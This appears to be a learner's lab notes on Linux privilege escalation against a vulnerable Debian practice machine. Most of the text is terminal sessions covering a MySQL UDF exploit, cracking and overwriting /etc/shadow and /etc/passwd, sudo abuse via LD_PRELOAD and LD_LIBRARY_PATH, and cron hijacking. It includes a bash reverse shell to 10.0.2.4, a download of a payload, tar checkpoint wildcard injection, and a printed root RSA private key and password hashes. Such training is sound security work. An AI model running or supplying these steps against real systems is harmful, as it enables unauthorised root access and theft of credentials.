Looking at the results, we can see that we have a popular kernel exploit (Dirty COW)
Run exploit and execute /usr/bin/passwd binary
Service Exploits
What are Services?
Programs that run in the background, acceptin input or performing regular tasks.
If vulnerable services are running as root, exploitin them can lead to command exection as root.
Service exploits can be found using Searchsploit, Google and GitHub.
Services Running as Root
The follwing command will show all processes that are running as root.
ps aux | grep "^root"
With the results, as with any, try to identify the version number of the program being executed.
Enumerating Program Versions
<program> --version
<program> -v
#DPKG CAN SHOW INSTALLED PROGRAMS AND THEIR VERSION
dpkg -l | grep <program>
#RPM SYSTEMS
rpm -qa | grep <program>
Service Exploit Example
./lse.sh -l 1 -i
MySQL is running as root .
You can connect to MySQL as root without a password!
You can verify with:
ps aux | grep '^root'
This will list processes that run as root *mysqld
Why is this important?
MySQL has the ability to install user defined functions which run via shared objects. The following exploit can be used to install a new function that will allow us to execute system commands from a mysql command prompt. commands will be executed as root because mysql is running as root.
gcc -g -c raptor_udf2.c -fPIC
Execute commands
Port Forwarding
'Sometimes root processes may be bound to an internal port, through which it communicates. You can forward the port using the follwing SSH command:
#Determice which port MYSQL is listening.
netstat -nl
#ON OUR TARGET MACHINE
ssh -R 4444:127.0.0.1:3306 kali@10.0.2.4
#ON OUR KALI MACHINE
mysql -u root -h 127.0.0.1 -P 4444
select @@hostname;
Weak File Permissions
If permissions on files are weak, system files can be taken advantage of to perform privelege escalation.
/etc/shadow contains password hashes and by default is only readable by root.
If we can read this file, we may be able to crack the root users hash.
If we can modify, we can replace root user hash with a hash we know.
./lin.sh -i | more
!] sys030 Can we read /etc/shadow file?................................... yes!
---
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::
#We have readble and writeable
user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
user@debian:~/tools/privesc-scripts$
user@debian:~/tools/privesc-scripts$ head -n 1 /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
user@debian:~/tools/privesc-scripts$
This is important, the first two colons contain the hash.in this case it is:
kali@kali:~$ sudo john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2021-01-04 19:48) 1.515g/s 2327p/s 2327c/s 2327C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Writing to shadow
Similarly, because we can write onto the shadow file.
/etc/passwd used to contain hashes, back in the day.
passwd takes precedent over the shadow file
root@debian:/home/user# ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd
root@debian:/home/user# openssl passwd "password"
YQyhPgG7w5s3s
root@debian:/home/user# vi /etc/passwd
root@debian:/home/user# exit
exit
user@debian:~$ su
Password:
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
can also create a new user with root privleges by copying code to teh bottom as long as uid is 0 it is root
Backups
Eventhough backups may exist, they may be insecure backups. Check /home / (root) /tmp /var/backups
root@debian:/.ssh# cat root_key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl
p4oSmTxYnO0LDcsezwNhBZn0kljtGu9p+dmmKbk40W4SWlTvU1LcEHRr6RgWMgQo
OHhxUFddFtYrknS4GiL5TJH6bt57xoIECnRc/8suZyWzgRzbo+TvDewK3ZhBN7HD
eV9G5JrjnVrDqSjhysUANmUTjUCTSsofUwlum+pU/dl9YCkXJRp7Hgy/QkFKpFET
Z36Z0g1JtQkwWxUD/iFj+iapkLuMaVT5dCq9kQIDAQABAoIBAQDDWdSDppYA6uz2
NiMsEULYSD0z0HqQTjQZbbhZOgkS6gFqa3VH2OCm6o8xSghdCB3Jvxk+i8bBI5bZ
YaLGH1boX6UArZ/g/mfNgpphYnMTXxYkaDo2ry/C6Z9nhukgEy78HvY5TCdL79Q+
5JNyccuvcxRPFcDUniJYIzQqr7laCgNU2R1lL87Qai6B6gJpyB9cP68rA02244el
WUXcZTk68p9dk2Q3tk3r/oYHf2LTkgPShXBEwP1VkF/2FFPvwi1JCCMUGS27avN7
VDFru8hDPCCmE3j4N9Sw6X/sSDR9ESg4+iNTsD2ziwGDYnizzY2e1+75zLyYZ4N7
6JoPCYFxAoGBAPi0ALpmNz17iFClfIqDrunUy8JT4aFxl0kQ5y9rKeFwNu50nTIW
1X+343539fKIcuPB0JY9ZkO9d4tp8M1Slebv/p4ITdKf43yTjClbd/FpyG2QNy3K
824ihKlQVDC9eYezWWs2pqZk/AqO2IHSlzL4v0T0GyzOsKJH6NGTvYhrAoGBAOL6
Wg07OXE08XsLJE+ujVPH4DQMqRz/G1vwztPkSmeqZ8/qsLW2bINLhndZdd1FaPzc
U7LXiuDNcl5u+Pihbv73rPNZOsixkklb5t3Jg1OcvvYcL6hMRwLL4iqG8YDBmlK1
Rg1CjY1csnqTOMJUVEHy0ofroEMLf/0uVRP3VsDzAoGBAIKFJSSt5Cu2GxIH51Zi
SXeaH906XF132aeU4V83ZGFVnN6EAMN6zE0c2p1So5bHGVSCMM/IJVVDp+tYi/GV
d+oc5YlWXlE9bAvC+3nw8P+XPoKRfwPfUOXp46lf6O8zYQZgj3r+0XLd6JA561Im
jQdJGEg9u81GI9jm2D60xHFFAoGAPFatRcMuvAeFAl6t4njWnSUPVwbelhTDIyfa
871GglRskHslSskaA7U6I9QmXxIqnL29ild+VdCHzM7XZNEVfrY8xdw8okmCR/ok
X2VIghuzMB3CFY1hez7T+tYwsTfGXKJP4wqEMsYntCoa9p4QYA+7I+LhkbEm7xk4
CLzB1T0CgYB2Ijb2DpcWlxjX08JRVi8+R7T2Fhh4L5FuykcDeZm1OvYeCML32EfN
Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4
LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw==
-----END RSA PRIVATE KEY-----
root@debian:/.ssh# gretp PermitRootLogin /etc/ssh/sshd_config
bash: gretp: command not found
root@debian:/.ssh# grep PermitRootLogin /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
root@debian:/.ssh#
kali@kali:~$ vi root_key
kali@kali:~$ chmod 600 root_key
kali@kali:~$ ssh -i root_key root@10.0.2.7
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 3 14:00:26 2021
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~#
Running Sudo
user@debian:~/tools/privesc-scripts$ ./lse.sh -i | more
[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/privesc-scripts$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/privesc-scripts$ sudo apache2 -f /etc/shadow
Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
LD_Preload
user@debian:~/tools/sudo$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ls -l
total 8
-rw-r--r-- 1 user user 184 May 15 2020 library_path.c
-rw-r--r-- 1 user user 149 May 15 2020 preload.c
user@debian:~/tools/sudo$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
user@debian:~/tools/sudo$ sudo LD_PRELOAD=/tmp/preload.so find
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo# whoami
root
LD_LIBRARY_PATH
This environment variable contains a set of directories where shared libraries are searched first
ldd command can be used to print the shared libraries used by a program
ldd /usr/sbin/apache2
By creating a library with the same name as the one used by a program, and setting LDLIBRARY_PATH to its parent directory, the program will load our shared library instead.
user@debian:~/tools/sudo$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fff42178000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fa3a02e8000)
libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fa3a00c4000)
libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fa39fe8a000)
libpthread.so.0 => /lib/libpthread.so.0 (0x00007fa39fc6e000)
libc.so.6 => /lib/libc.so.6 (0x00007fa39f902000)
libuuid.so.1 => /lib/libuuid.so.1 (0x00007fa39f6fd000)
librt.so.1 => /lib/librt.so.1 (0x00007fa39f4f5000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fa39f2be000)
libdl.so.2 => /lib/libdl.so.2 (0x00007fa39f0b9000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fa39ee91000)
/lib64/ld-linux-x86-64.so.2 (0x00007fa3a07a5000)
user@debian:~/tools/sudo$ ls
library_path.c preload.c
user@debian:~/tools/sudo$ gcc -o libcrypt.so.1 -shared -fPIC library_path.c
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=. apache2
apache2: ./libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo#
CronJOBBERS
Cronjobs are programs or scripts that run at a scheduled time at certain time intervals
Crontabs store configuration for cronjobs. These are located at.
/var/spool/cron/
/var/spool/cro!n/crontabs/
systemwide /etc/crontab
File Permissions
Misconfiguration of a file permission associated with a cronjob can lead to easy Root!
./lse.sh -l 1 -i | more
[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 * * * * root cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/crontab:* * * * * root overwrite.sh
/etc/crontab:* * * * * root /usr/local/bin/compress.sh
q:q^Cuser@debian:~/tools/privesc-scripts$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
user@debian:~/tools/privesc-scripts$ locate overwrite.sh
/usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$
#REVERSE SHELL ON THE JOBBER
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ cat /usr/local/bin/overwrite.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.0.2.4/1111 0>&1
user@debian:~/tools/privesc-scripts$
Writing Paths present in Cronjobs
PATH Environment variable is by default set to /usr/bin/:bin
PATH variable can be overwritten in the crontab file
If cronjob does not use an absolute path, and one of the PATH directories is writeable by our user, we may be able to create a program/script with the same name as the cronjob
./lse.sh -l 1 -i | more
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
user@debian:~/tools/privesc-scripts$ vim overwrite.sh
user@debian:~/tools/privesc-scripts$ chmod +x overwrite.sh
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ pwd
/home/user/tools/privesc-scripts
user@debian:~/tools/privesc-scripts$ cp overwrite.sh /home/user/
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ ls -l /tmp/
total 1044
-rw-r--r-- 1 root root 100740 Jan 4 08:29 backup.tar.gz
-rwxr-xr-x 1 user user 3857 Jan 4 07:36 preload.so
-rwsr-sr-x 1 root root 926536 Jan 4 08:29 rootbash
-rw------- 1 user user 7817 Jan 4 08:04 tmp.5CqN3heSzG
-rw------- 1 user user 11151 Jan 4 08:03 tmp.EVXGVRQj7P
-rw-r--r-- 1 root root 28 Jan 4 08:09 useless
user@debian:~/tools/privesc-scripts$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# whoami
root
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@debian:~$ wget http://10.0.2.4:80/shell.elf
--2021-01-04 08:39:27-- http://10.0.2.4/shell.elf
Connecting to 10.0.2.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: “shell.elf”
100%[=================================================================================================================>] 194 --.-K/s in 0s
2021-01-04 08:39:27 (52.0 MB/s) - “shell.elf” saved [194/194]
user@debian:~$ ls
myvpn.ovpn overwrite.sh shadow_backup shell.elf tools
user@debian:~$ chmod +x shell.elf
user@debian:~$ touch ./--checkpoint=1
user@debian:~$ touch ./--checkpoint-action=exec=shell.elf
user@debian:~$
Attacker machine
kali@kali:~$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.2.7.
Ncat: Connection from 10.0.2.7:55114.
id
uid=0(root) gid=0(root) groups=0(root)
